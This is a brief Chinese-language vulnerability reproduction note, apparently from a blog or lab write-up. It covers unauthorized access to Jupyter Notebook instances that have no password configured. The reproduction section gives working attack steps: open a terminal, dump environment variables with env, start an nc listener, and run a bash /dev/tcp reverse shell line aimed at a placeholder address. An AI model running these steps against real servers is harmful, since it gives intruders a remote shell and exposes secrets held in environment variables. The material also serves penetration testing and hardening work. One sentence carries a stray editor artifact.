Jupyter Notebook 未授权访问漏洞
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多加粗样式种编程语言。
如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
复现
在Terminal 创建控制台处可以执行任意命令
env打印环境变量
反弹shell
# 本机监听
nc -lvp 5555
# 目标执行
bash -i >& /dev/tcp/x.x.x.x/5555 0>&1